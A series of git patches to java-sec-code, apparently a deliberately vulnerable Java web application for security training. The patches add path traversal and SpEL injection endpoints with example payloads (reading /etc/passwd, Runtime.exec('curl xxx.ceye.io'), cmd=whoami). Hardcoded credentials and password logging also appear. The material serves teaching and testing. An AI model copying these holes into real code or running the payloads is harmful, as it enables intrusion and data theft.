Subject: [PATCH 045/108] add index html page

---
 .../java/org/joychou/controller/Index.java    | 28 ++++++++++++++-----
 .../java/org/joychou/controller/Login.java    |  6 +---
 .../org/joychou/controller/jsonp/JSONP.java   |  9 +++---
 .../joychou/security/LoginFailureHandler.java |  2 +-
 .../joychou/security/LoginSuccessHandler.java |  4 +--
 src/main/resources/templates/index.html       | 14 ++++++++++
 src/main/resources/templates/login.html       |  2 +-
 7 files changed, 44 insertions(+), 21 deletions(-)
 create mode 100644 src/main/resources/templates/index.html

diff --git a/src/main/java/org/joychou/controller/Index.java b/src/main/java/org/joychou/controller/Index.java
index e38761d1..0ec9a152 100644
--- a/src/main/java/org/joychou/controller/Index.java
+++ b/src/main/java/org/joychou/controller/Index.java
@@ -3,6 +3,7 @@
 
 import com.alibaba.fastjson.JSON;
 import org.springframework.stereotype.Controller;
+import org.springframework.ui.Model;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 
@@ -12,18 +13,19 @@
 
 
 /**
- * @author  JoyChou (joychou@joychou.org)
- * @date    2018.05.28
- * @desc    Index Page
+ * Index page
+ *
+ * @author JoyChou @2018-05-28
  */
-
 @Controller
 public class Index {
-    @RequestMapping("/index")
+
+    @RequestMapping("/appInfo")
     @ResponseBody
-    public static String index(HttpServletRequest request) {
+    public static String appInfo(HttpServletRequest request) {
         String username = request.getUserPrincipal().getName();
-        Map m = new HashMap();
+        Map<String, String> m = new HashMap<>();
+
         m.put("username", username);
         m.put("login", "success");
         m.put("app_name", "java security code");
@@ -33,4 +35,16 @@ public static String index(HttpServletRequest request) {
         // covert map to string
         return JSON.toJSONString(m);
     }
+
+    @RequestMapping("/")
+    public String redirect() {
+        return "redirect:/index";
+    }
+
+    @RequestMapping("/index")
+    public static String index(Model model, HttpServletRequest request) {
+        String username = request.getUserPrincipal().getName();
+        model.addAttribute("user", username);
+        return "index";
+    }
 }
diff --git a/src/main/java/org/joychou/controller/Login.java b/src/main/java/org/joychou/controller/Login.java
index 7983efcd..542f94e5 100644
--- a/src/main/java/org/joychou/controller/Login.java
+++ b/src/main/java/org/joychou/controller/Login.java
@@ -43,7 +43,7 @@ public String logoutPage (HttpServletRequest request, HttpServletResponse respon
         }
 
         if (null == request.getUserPrincipal()) {
-            logger.info("User " + username + " logout successfully.");
+            logger.info("USER " + username + " LOGOUT SUCCESS.");
         } else {
             logger.info("User " + username + " logout failed. Please try again.");
         }
@@ -51,8 +51,4 @@ public String logoutPage (HttpServletRequest request, HttpServletResponse respon
         return "redirect:/login?logout";
     }
 
-    @RequestMapping("/")
-    public String redirect() {
-        return "redirect:/index";
-    }
 }
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/jsonp/JSONP.java
index 9c7eac25..131d9bb3 100644
--- a/src/main/java/org/joychou/controller/jsonp/JSONP.java
+++ b/src/main/java/org/joychou/controller/jsonp/JSONP.java
@@ -6,7 +6,6 @@
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.*;
 import javax.servlet.http.HttpServletRequest;
-import javax.servlet.http.HttpServletResponse;
 import java.security.Principal;
 import java.util.HashMap;
 import java.util.Map;
@@ -30,7 +29,7 @@ public static String getUserInfo(HttpServletRequest request) {
 
         String username = principal.getName();
 
-        Map m = new HashMap();
+        Map<String, String> m = new HashMap<>();
         m.put("Username", username);
 
         return JSON.toJSONString(m);
@@ -42,7 +41,7 @@ public static String getUserInfo(HttpServletRequest request) {
      *
      */
     @RequestMapping(value = "/referer", produces = "application/javascript")
-    private String referer(HttpServletRequest request, HttpServletResponse response) {
+    private String referer(HttpServletRequest request) {
         String callback = request.getParameter("callback");
         return callback + "(" + getUserInfo(request) + ")";
     }
@@ -55,7 +54,7 @@ private String referer(HttpServletRequest request, HttpServletResponse response)
      *
      */
     @RequestMapping(value = "/emptyReferer", produces = "application/javascript")
-    private String emptyReferer(HttpServletRequest request, HttpServletResponse response) {
+    private String emptyReferer(HttpServletRequest request) {
         String referer = request.getHeader("referer");
 
         if (null != referer && !SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) {
@@ -85,7 +84,7 @@ public JSONObject advice(HttpServletRequest request) {
      * http://localhost:8080/jsonp/sec?callback=test
      */
     @RequestMapping(value = "/sec", produces = "application/javascript")
-    private String safecode(HttpServletRequest request, HttpServletResponse response) {
+    private String safecode(HttpServletRequest request) {
         String referer = request.getHeader("referer");
 
         if (!SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) {
diff --git a/src/main/java/org/joychou/security/LoginFailureHandler.java b/src/main/java/org/joychou/security/LoginFailureHandler.java
index ab3329e1..eb41014e 100644
--- a/src/main/java/org/joychou/security/LoginFailureHandler.java
+++ b/src/main/java/org/joychou/security/LoginFailureHandler.java
@@ -26,7 +26,7 @@ public void onAuthenticationFailure(HttpServletRequest request,
                 " password: " + request.getParameter("password") );
 
         response.setContentType(MediaType.APPLICATION_JSON_VALUE);
-        response.getWriter().write("{\"code\":0, \"message\":\"Login failed.\"}");
+        response.getWriter().write("{\"code\":1, \"message\":\"Login failed.\"}");
     }
 
 }
diff --git a/src/main/java/org/joychou/security/LoginSuccessHandler.java b/src/main/java/org/joychou/security/LoginSuccessHandler.java
index 05b7cb2c..2a81afa2 100644
--- a/src/main/java/org/joychou/security/LoginSuccessHandler.java
+++ b/src/main/java/org/joychou/security/LoginSuccessHandler.java
@@ -21,10 +21,10 @@ public void onAuthenticationSuccess(HttpServletRequest request,
                                         HttpServletResponse response, Authentication authentication)
                                         throws ServletException, IOException {
 
-        logger.info("USER : " + authentication.getName()+ " LOGIN success!");
+        logger.info("USER " + authentication.getName()+ " LOGIN SUCCESS.");
 
         // google ajax and sendRedirect
         response.setContentType(MediaType.APPLICATION_JSON_VALUE);
-        response.getWriter().write("{\"code\":1,\"message\":\"Login success!\"}");
+        response.getWriter().write("{\"code\":0, \"message\":\"Login success\"}");
     }
 }
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
new file mode 100644
index 00000000..377f5a0d
--- /dev/null
+++ b/src/main/resources/templates/index.html
@@ -0,0 +1,14 @@
+<!DOCTYPE html>
+<html xmlns:th="http://www.thymeleaf.org">
+<head>
+    <meta charset="UTF-8" />
+    <title>Home Page</title>
+</head>
+<body>
+    <p>Hello <span th:text="${user}"></span>.</p>
+    <p>Welcome to login java-sec-code application.</p>
+    <a th:href="@{/logout}">logout</a>
+
+    <p></p>
+</body>
+</html>
\ No newline at end of file
diff --git a/src/main/resources/templates/login.html b/src/main/resources/templates/login.html
index dddf2604..8dc4b02a 100644
--- a/src/main/resources/templates/login.html
+++ b/src/main/resources/templates/login.html
@@ -28,7 +28,7 @@
                 data: {"username": username, "password": password, "remember-me": remember_me},
                 dataType: "json",
                 success: function (r) {
-                    if (r.code == 1) {
+                    if (r.code == 0) {
                         alert(r.message);
                         location.href = ctx + 'index';
                     } else {

From a2a5eeec3625d5605ee0dcae9c400e4fac07117e Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 22 Jul 2019 13:34:37 +0800
Subject: [PATCH 046/108] update mybatis readme

---
 README.md                               | 8 ++++++++
 README_zh.md                            | 7 +++++++
 src/main/resources/templates/login.html | 2 +-
 3 files changed, 16 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 77dfd32f..13b918bc 100644
--- a/README.md
+++ b/README.md
@@ -75,6 +75,14 @@ Sort by letter.
 
 ## How to run
 
+The application will use mybatis auto-injection. Please run mysql ahead of time and configure the mysql database.
+
+``` 
+spring.datasource.url=jdbc:mysql://127.0.0.1:3306/java_sec_code
+spring.datasource.username=root
+spring.datasource.password=woshishujukumima
+```
+
 - Tomcat
 - IDEA
 - JAR
diff --git a/README_zh.md b/README_zh.md
index f94932a1..6c214051 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -72,6 +72,13 @@ Tomcat默认JSESSION会话有效时间为30分钟，所以30分钟不操作会
 
 ## 如何运行
 
+应用会用到mybatis自动注入，请提前运行mysql，并且进行mysql数据库配置。
+
+``` 
+spring.datasource.url=jdbc:mysql://127.0.0.1:3306/java_sec_code
+spring.datasource.username=root
+spring.datasource.password=woshishujukumima
+```
 
 ### Tomcat
 
diff --git a/src/main/resources/templates/login.html b/src/main/resources/templates/login.html
index 8dc4b02a..5c5415aa 100644
--- a/src/main/resources/templates/login.html
+++ b/src/main/resources/templates/login.html
@@ -29,7 +29,7 @@
                 dataType: "json",
                 success: function (r) {
                     if (r.code == 0) {
-                        alert(r.message);
+                        // alert(r.message);
                         location.href = ctx + 'index';
                     } else {
                         alert(r.message);

From 720da395006a82ebf4b4a41b453671b9d2657f46 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Tue, 23 Jul 2019 15:45:55 +0800
Subject: [PATCH 047/108] add pathTraversal

---
 README.md                                     |  6 +-
 README_zh.md                                  |  6 +-
 pom.xml                                       |  5 ++
 .../org/joychou/controller/PathTraversal.java | 56 +++++++++++++++++++
 .../java/org/joychou/controller/SSRF.java     |  1 -
 .../controller/{SPEL.java => SpEL.java}       | 33 +++++------
 .../org/joychou/security/SecurityUtil.java    | 34 +++++++++++
 src/main/resources/templates/index.html       |  2 -
 8 files changed, 122 insertions(+), 21 deletions(-)
 create mode 100644 src/main/java/org/joychou/controller/PathTraversal.java
 rename src/main/java/org/joychou/controller/{SPEL.java => SpEL.java} (52%)

diff --git a/README.md b/README.md
index 13b918bc..8beca109 100644
--- a/README.md
+++ b/README.md
@@ -75,7 +75,7 @@ Sort by letter.
 
 ## How to run
 
-The application will use mybatis auto-injection. Please run mysql ahead of time and configure the mysql database.
+The application will use mybatis auto-injection. Please run mysql server ahead of time and configure the mysql server database's name and username/password.
 
 ``` 
 spring.datasource.url=jdbc:mysql://127.0.0.1:3306/java_sec_code
@@ -153,6 +153,10 @@ Build package and run.
 mvn clean package -DskipTests 
 java -jar target/java-sec-code-1.0.0.jar
 ```
+## Contributors
+
+Core developers : [JoyChou](https://github.com/JoyChou93).
+Other developers: [lightless](https://github.com/lightless233),  [Anemone95](https://github.com/Anemone95). 
 
 
 ## Donate
diff --git a/README_zh.md b/README_zh.md
index 6c214051..155dd61d 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -72,7 +72,7 @@ Tomcat默认JSESSION会话有效时间为30分钟，所以30分钟不操作会
 
 ## 如何运行
 
-应用会用到mybatis自动注入，请提前运行mysql，并且进行mysql数据库配置。
+应用会用到mybatis自动注入，请提前运行mysql服务，并且配置mysql服务的数据库名称和用户名密码。
 
 ``` 
 spring.datasource.url=jdbc:mysql://127.0.0.1:3306/java_sec_code
@@ -136,6 +136,10 @@ mvn clean package -DskipTests
 java -jar 打包后的jar包路径
 ```
 
+## 贡献者
+
+核心开发者： [JoyChou](https://github.com/JoyChou93).其他开发者：[lightless](https://github.com/lightless233),  [Anemone95](https://github.com/Anemone95)。欢迎各位提交PR。
+
 ## 捐赠
 
 如果你喜欢这个项目，你可以捐款来支持我。 有了你的支持，我将能够更好地制作`Java sec code`项目。
diff --git a/pom.xml b/pom.xml
index 99e59ea0..1ea2f0f2 100644
--- a/pom.xml
+++ b/pom.xml
@@ -9,6 +9,11 @@
     <version>1.0.0</version>
     <packaging>war</packaging>
 
+    <properties>
+        <maven.compiler.source>1.8</maven.compiler.source> <!-- mvn clean package-->
+        <maven.compiler.target>1.8</maven.compiler.target>
+    </properties>
+
 
     <parent>
         <groupId>org.springframework.boot</groupId>
diff --git a/src/main/java/org/joychou/controller/PathTraversal.java b/src/main/java/org/joychou/controller/PathTraversal.java
new file mode 100644
index 00000000..76f9a2ce
--- /dev/null
+++ b/src/main/java/org/joychou/controller/PathTraversal.java
@@ -0,0 +1,56 @@
+package org.joychou.controller;
+
+import org.apache.commons.codec.binary.Base64;
+import org.joychou.security.SecurityUtil;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import java.io.File;
+import java.io.IOException;
+import java.nio.charset.StandardCharsets;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+
+@RestController
+public class PathTraversal {
+
+    protected final Logger logger = LoggerFactory.getLogger(this.getClass());
+
+    /**
+     * http://localhost:8080/path_traversal/vul?filepath=../../../../../etc/passwd
+     */
+    @GetMapping("/path_traversal/vul")
+    public String getImage(String filepath) throws IOException {
+        return getImgBase64(filepath);
+    }
+
+    @GetMapping("/path_traversal/sec")
+    public String getImageSec(String filepath) throws IOException {
+        if (SecurityUtil.pathFilter(filepath) == null) {
+            logger.info("Illegal file path: " + filepath);
+            return "Bad boy. Illegal file path.";
+        }
+        return getImgBase64(filepath);
+    }
+
+    private String getImgBase64(String imgFile) throws IOException {
+
+        logger.info("Working directory: " + System.getProperty("user.dir"));
+        logger.info("File path: " + imgFile);
+
+        File f = new File(imgFile);
+        if(f.exists() && !f.isDirectory()) {
+            byte[] data = Files.readAllBytes( Paths.get(imgFile) );
+            return new String( Base64.encodeBase64(data) );
+        } else {
+            return "File doesn't exist or is not a file.";
+        }
+    }
+
+    public static void main(String[] argv) throws IOException {
+        String aa = new String(Files.readAllBytes(Paths.get("pom.xml")), StandardCharsets.UTF_8);
+        System.out.println(aa);
+    }
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index fec5cf23..fca0e63a 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -31,7 +31,6 @@
  * @desc    Java ssrf vuls code.
  */
 
-
 @Controller
 @RequestMapping("/ssrf")
 public class SSRF {
diff --git a/src/main/java/org/joychou/controller/SPEL.java b/src/main/java/org/joychou/controller/SpEL.java
similarity index 52%
rename from src/main/java/org/joychou/controller/SPEL.java
rename to src/main/java/org/joychou/controller/SpEL.java
index e0ad72fb..28fdafde 100644
--- a/src/main/java/org/joychou/controller/SPEL.java
+++ b/src/main/java/org/joychou/controller/SpEL.java
@@ -1,29 +1,30 @@
 package org.joychou.controller;
 
+import org.springframework.expression.EvaluationContext;
 import org.springframework.expression.ExpressionParser;
 import org.springframework.expression.spel.standard.SpelExpressionParser;
-import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.ResponseBody;
-import javax.servlet.http.HttpServletRequest;
+import org.springframework.web.bind.annotation.RestController;
+
 
 /**
-    @author   JoyChou (joychou@joychou.org)
-    @date     2019.01.17
-    @esc      SPEL leas to RCE
-    @usage    http://localhost:8080/spel/rce?expression=xxx. xxx is urlencode(exp)
-    @exp      T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
+ * SpEL Injection
+ *
+ * @author JoyChou @2019-01-17
  */
+@RestController
+public class SpEL {
 
-@Controller
-@RequestMapping("/spel")
-public class SPEL {
-
-    @RequestMapping("/rce")
-    @ResponseBody
-    private static String rce(HttpServletRequest request) {
-        String expression = request.getParameter("expression");
+    /**
+     * SPEL to RCE
+     * http://localhost:8080/spel/vul/?expression=xxx.
+     * xxx is urlencode(exp)
+     * exp: T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
+     */
+    @RequestMapping("/spel/vul")
+    private static String rce(String expression) {
         ExpressionParser parser = new SpelExpressionParser();
+        // fix method: SimpleEvaluationContext
         String result = parser.parseExpression(expression).getValue().toString();
         return result;
     }
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index edab9ab7..c01d88a4 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -1,9 +1,15 @@
 package org.joychou.security;
 
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+
+import java.io.UnsupportedEncodingException;
 import java.net.URI;
+import java.net.URLDecoder;
 
 public class SecurityUtil {
 
+    protected static Logger logger = LoggerFactory.getLogger(SecurityUtil.class);
     /**
      * 通过endsWith判断URL是否合法
      *
@@ -72,4 +78,32 @@ public static boolean checkSSRFByHostWlist(String url, String[] hostWlist) {
         return checkURLbyEndsWith(url, hostWlist);
     }
 
+    /**
+     * Filter file path to prevent path traversal vulns.
+     *
+     * @param filepath file path
+     * @return illegal file path return null
+     */
+    public static String pathFilter(String filepath) {
+        String temp = filepath;
+
+        // use while to sovle multi urlencode
+        while (temp.indexOf('%') != -1) {
+            try {
+                temp = URLDecoder.decode(temp, "utf-8");
+            } catch (UnsupportedEncodingException e) {
+                logger.info("Unsupported encoding exception: " + filepath);
+                return null;
+            } catch (Exception e) {
+                logger.info(e.toString());
+                return null;
+            }
+        }
+
+        if (temp.indexOf("..") != -1 || temp.charAt(0) == '/') {
+            return null;
+        }
+
+        return filepath;
+    }
 }
\ No newline at end of file
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 377f5a0d..1ed64577 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -8,7 +8,5 @@
     <p>Hello <span th:text="${user}"></span>.</p>
     <p>Welcome to login java-sec-code application.</p>
     <a th:href="@{/logout}">logout</a>
-
-    <p></p>
 </body>
 </html>
\ No newline at end of file

From 179f45e2ed5f373a6bbb8ca5e1ac909195abb4a7 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Tue, 23 Jul 2019 16:13:08 +0800
Subject: [PATCH 048/108] update readme

---
 README.md    | 1 +
 README_zh.md | 1 +
 2 files changed, 2 insertions(+)

diff --git a/README.md b/README.md
index 8beca109..cb211e37 100644
--- a/README.md
+++ b/README.md
@@ -46,6 +46,7 @@ Sort by letter.
 - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/jsonp/JSONP.java)
+- [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
 - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
diff --git a/README_zh.md b/README_zh.md
index 155dd61d..460e48bc 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -42,6 +42,7 @@ Tomcat默认JSESSION会话有效时间为30分钟，所以30分钟不操作会
 - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/jsonp/JSONP.java)
+- [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
 - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)

From 6b8b1d11e49f842886d950bb696a3f186fd190b5 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 24 Jul 2019 11:55:32 +0800
Subject: [PATCH 049/108] closes #6

---
 README.md                                     | 37 ++++-------
 README_zh.md                                  | 65 ++++++++++---------
 .../java/org/joychou/config/WebConfig.java    | 55 ++++++++++++++++
 .../java/org/joychou/controller/Index.java    |  2 +
 .../java/org/joychou/security/HttpFilter.java | 22 ++-----
 src/main/resources/templates/index.html       |  2 +-
 6 files changed, 112 insertions(+), 71 deletions(-)
 create mode 100644 src/main/java/org/joychou/config/WebConfig.java

diff --git a/README.md b/README.md
index cb211e37..a742c047 100644
--- a/README.md
+++ b/README.md
@@ -48,7 +48,7 @@ Sort by letter.
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/jsonp/JSONP.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
-- [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java)
+- [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
 - [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)
 - [SSTI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSTI.java)
@@ -84,35 +84,19 @@ spring.datasource.username=root
 spring.datasource.password=woshishujukumima
 ```
 
-- Tomcat
 - IDEA
+- Tomcat
 - JAR
 
-### Tomcat
 
-- Exclude tomcat in pom.xml.
-
-    ```xml
-    <dependency>
-        <groupId>org.springframework.boot</groupId>
-        <artifactId>spring-boot-starter-web</artifactId>
-        <exclusions>
-            <exclusion>
-                <groupId>org.springframework.boot</groupId>
-                <artifactId>spring-boot-starter-tomcat</artifactId>
-            </exclusion>
-        </exclusions>
-    </dependency>
-    ```
+### IDEA
 
-- Build war package by `mvn clean package`.
-- Copy war package to tomcat webapps directory.
-- Start tomcat application.
+Click `run` button.
 
 Example:
 
 ```
-http://localhost:8080/java-sec-code-1.0.0/rce/exec?cmd=whoami
+http://localhost:8080/rce/exec?cmd=whoami
 ```
 
 return:
@@ -121,14 +105,17 @@ return:
 Viarus
 ```
 
-### IDEA
+### Tomcat
 
-Click `run` button.
+
+- Build war package by `mvn clean package`.
+- Copy war package to tomcat webapps directory.
+- Start tomcat application.
 
 Example:
 
 ```
-http://localhost:8080/rce/exec?cmd=whoami
+http://localhost:8080/java-sec-code-1.0.0/rce/exec?cmd=whoami
 ```
 
 return:
@@ -137,6 +124,7 @@ return:
 Viarus
 ```
 
+
 ### JAR
 
 Change `war` to `jar` in `pom.xml`.
@@ -154,6 +142,7 @@ Build package and run.
 mvn clean package -DskipTests 
 java -jar target/java-sec-code-1.0.0.jar
 ```
+
 ## Contributors
 
 Core developers : [JoyChou](https://github.com/JoyChou93).
diff --git a/README_zh.md b/README_zh.md
index 460e48bc..d43e473b 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -10,25 +10,6 @@
 
 每个漏洞类型代码默认存在安全漏洞（除非本身不存在漏洞），相关修复代码在注释里。具体可查看每个漏洞代码和注释。
 
-## 认证
-
-### 登录
-
-[http://localhost:8080/login](http://localhost:8080/login)
-
-如果未登录，访问任何页面都会重定向到login页面。用户名和密码如下。
-
-```
-admin/admin123
-joychou/joychou123
-```
-### 登出
-
-[http://localhost:8080/logout](http://localhost:8080/logout)
-
-### 记住我
-
-Tomcat默认JSESSION会话有效时间为30分钟，所以30分钟不操作会话将过期。为了解决这一问题，引入rememberMe功能，默认过期时间为2周。
 
 ## 漏洞代码
 
@@ -44,7 +25,7 @@ Tomcat默认JSESSION会话有效时间为30分钟，所以30分钟不操作会
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/jsonp/JSONP.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
-- [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java)
+- [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
 - [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)
 - [SSTI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSTI.java)
@@ -81,17 +62,20 @@ spring.datasource.username=root
 spring.datasource.password=woshishujukumima
 ```
 
-### Tomcat
+- IDEA
+- Tomcat
+- JAR
 
-1. 生成war包 `mvn clean package`。
-2. 将target目录的war包，cp到Tomcat的webapps目录。
-3. 重启Tomcat应用。
 
 
+### IDEA
+
+直接点击run按钮即可运行。
+
 例子：
 
 ```
-http://localhost:8080/java-sec-code-1.0.0/rce/exec?cmd=whoami
+http://localhost:8080/rce/exec?cmd=whoami
 ```
  
 返回：
@@ -100,14 +84,17 @@ http://localhost:8080/java-sec-code-1.0.0/rce/exec?cmd=whoami
 Viarus
 ```
 
-### IDEA
+### Tomcat
+
+1. 生成war包 `mvn clean package`。
+2. 将target目录的war包，cp到Tomcat的webapps目录。
+3. 重启Tomcat应用。
 
-直接点击run按钮即可运行。
 
 例子：
 
 ```
-http://localhost:8080/rce/exec?cmd=whoami
+http://localhost:8080/java-sec-code-1.0.0/rce/exec?cmd=whoami
 ```
  
 返回：
@@ -117,7 +104,6 @@ Viarus
 ```
 
 
-
 ### JAR包
 
 
@@ -137,6 +123,27 @@ mvn clean package -DskipTests
 java -jar 打包后的jar包路径
 ```
 
+## 认证
+
+### 登录
+
+[http://localhost:8080/login](http://localhost:8080/login)
+
+如果未登录，访问任何页面都会重定向到login页面。用户名和密码如下。
+
+```
+admin/admin123
+joychou/joychou123
+```
+### 登出
+
+[http://localhost:8080/logout](http://localhost:8080/logout)
+
+### 记住我
+
+Tomcat默认JSESSION会话有效时间为30分钟，所以30分钟不操作会话将过期。为了解决这一问题，引入rememberMe功能，默认过期时间为2周。
+
+
 ## 贡献者
 
 核心开发者： [JoyChou](https://github.com/JoyChou93).其他开发者：[lightless](https://github.com/lightless233),  [Anemone95](https://github.com/Anemone95)。欢迎各位提交PR。
diff --git a/src/main/java/org/joychou/config/WebConfig.java b/src/main/java/org/joychou/config/WebConfig.java
new file mode 100644
index 00000000..cd4770d4
--- /dev/null
+++ b/src/main/java/org/joychou/config/WebConfig.java
@@ -0,0 +1,55 @@
+package org.joychou.config;
+
+import org.springframework.beans.factory.annotation.Value;
+import org.springframework.stereotype.Component;
+
+
+/**
+ * Solve can't get value in filter by @Value when not using embed tomcat.
+ *
+ * @author JoyChou @2019-07-24
+ */
+@Component
+public class WebConfig {
+
+    private static Boolean referSecEnabled = false;
+    private static String[] callbacks;
+    private static String[] referWhitelist;
+    private static String[] referUris;
+
+    @Value("${joychou.security.referer.enabled}")
+    public void setReferSecEnabled(Boolean referSecEnabled){
+        WebConfig.referSecEnabled = referSecEnabled;
+    }
+    public static Boolean getReferSecEnabled(){
+        return referSecEnabled;
+    }
+
+
+    @Value("${joychou.security.jsonp.callback}")
+    public void setCallbacks(String[] callbacks){
+        WebConfig.callbacks = callbacks;
+    }
+    public static String[] getCallbacks(){
+        return callbacks;
+    }
+
+
+    @Value("${joychou.security.referer.hostwhitelist}")
+    public void setReferWhitelist(String[] referWhitelist){
+        WebConfig.referWhitelist = referWhitelist;
+    }
+    public static String[] getReferWhitelist(){
+        return referWhitelist;
+    }
+
+
+    @Value("${joychou.security.referer.uri}")
+    public void setReferUris(String[] referUris)
+    {
+        WebConfig.referUris = referUris;
+    }
+    public static String[] getReferUris(){
+        return referUris;
+    }
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/Index.java b/src/main/java/org/joychou/controller/Index.java
index 0ec9a152..df922e7d 100644
--- a/src/main/java/org/joychou/controller/Index.java
+++ b/src/main/java/org/joychou/controller/Index.java
@@ -2,6 +2,7 @@
 
 
 import com.alibaba.fastjson.JSON;
+import org.apache.catalina.util.ServerInfo;
 import org.springframework.stereotype.Controller;
 import org.springframework.ui.Model;
 import org.springframework.web.bind.annotation.RequestMapping;
@@ -26,6 +27,7 @@ public static String appInfo(HttpServletRequest request) {
         String username = request.getUserPrincipal().getName();
         Map<String, String> m = new HashMap<>();
 
+        m.put("tomcat_version", ServerInfo.getServerInfo());
         m.put("username", username);
         m.put("login", "success");
         m.put("app_name", "java security code");
diff --git a/src/main/java/org/joychou/security/HttpFilter.java b/src/main/java/org/joychou/security/HttpFilter.java
index 99309410..a49816ed 100644
--- a/src/main/java/org/joychou/security/HttpFilter.java
+++ b/src/main/java/org/joychou/security/HttpFilter.java
@@ -8,9 +8,9 @@
 import java.io.IOException;
 
 import org.apache.commons.lang.StringUtils;
+import org.joychou.config.WebConfig;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
-import org.springframework.beans.factory.annotation.Value;
 import org.springframework.util.AntPathMatcher;
 import org.springframework.util.PathMatcher;
 
@@ -25,18 +25,6 @@
 @WebFilter(filterName = "referFilter", urlPatterns = "/*")
 public class HttpFilter implements Filter {
 
-    @Value("${joychou.security.referer.enabled}")
-    private Boolean referSecEnabled = false;
-
-    @Value("${joychou.security.jsonp.callback}")
-    private String[] callbacks;
-
-    @Value("${joychou.security.referer.hostwhitelist}")
-    private String[] referWhitelist;
-
-    @Value("${joychou.security.referer.uri}")
-    private String[] referUris;
-
     @Override
     public void init(FilterConfig filterConfig) throws ServletException {
 
@@ -54,7 +42,7 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
         String refer = request.getHeader("referer");
